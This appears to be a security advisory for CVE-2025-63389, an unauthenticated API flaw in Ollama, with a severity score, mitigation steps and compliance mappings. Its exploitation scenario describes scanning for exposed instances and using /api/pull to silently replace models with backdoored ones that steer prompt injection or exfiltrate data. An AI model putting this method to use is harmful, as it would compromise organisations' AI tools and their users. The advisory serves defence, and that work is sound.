CVE-2025-63389

CRITICAL
Published December 18, 2025
CISO Take

Ollama instances exposed to any network interface — including internal networks and cloud VMs — are fully compromised with a single unauthenticated HTTP call. An attacker can pull, delete, or replace your production LLM models without leaving traditional credentials-based IOCs. Immediately firewall Ollama to localhost-only and verify no running instance is reachable beyond 127.0.0.1:11434; treat any internet-exposed Ollama as a confirmed incident.

Affected Systems

Package Ecosystem Vulnerable Range Patched
ollama pip No patch

Do you use ollama? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. 1. PATCH: Upgrade Ollama to a version beyond v0.12.3 when available; monitor the official GitHub releases actively. 2. ISOLATE IMMEDIATELY: Ensure Ollama binds only to 127.0.0.1 — set OLLAMA_HOST=127.0.0.1 in the service environment before restarting. 3. FIREWALL: Block TCP/11434 at the host firewall level (iptables/nftables/security groups) — do not rely on application-level binding alone. 4. REVERSE PROXY WITH AUTH: Place an authenticated reverse proxy (nginx/Caddy with basic auth or mTLS) in front of any Ollama instance that must be network-accessible. 5. AUDIT: Run `ollama list` and cross-reference model hashes against known-good pull manifests; any unexpected model is a potential IOC. 6. DETECT: Alert on unexpected HTTP POST to /api/pull, /api/delete, or /api/copy from any source other than localhost in network logs or WAF rules.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.2 - AI System Security — Access Control and Authentication A.6.2.6 - Access control to AI systems A.9.3 - AI system security and integrity
NIST AI RMF
GOVERN 6.1 - Policies and procedures for AI risk MANAGE 2.2 - Mechanisms to sustain the value of deployed AI systems MANAGE 4.1 - Post-deployment AI risk monitoring and incident response
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities LLM10:2025 - Model Theft

Technical Details

NVD Description

A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations.

Exploitation Scenario

An attacker performs an internet-wide scan for port 11434 or targets a known enterprise IP range. Upon finding an exposed Ollama instance, they issue a POST /api/pull with a payload pointing to an attacker-controlled registry hosting a backdoored GGUF model that mimics llama3 or mistral. The legitimate model is silently overwritten. Subsequent LLM queries from the enterprise's internal tools — RAG pipelines, code assistants, chatbots — now interact with the poisoned model, which is capable of prompt injection steering, data exfiltration via crafted responses, or jailbreak facilitation. Alternatively, the attacker deletes all loaded models via POST /api/delete, causing immediate denial of service to all AI-dependent workflows with no authentication trail in any SIEM.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
December 18, 2025
Last Modified
January 22, 2026
First Seen
December 18, 2025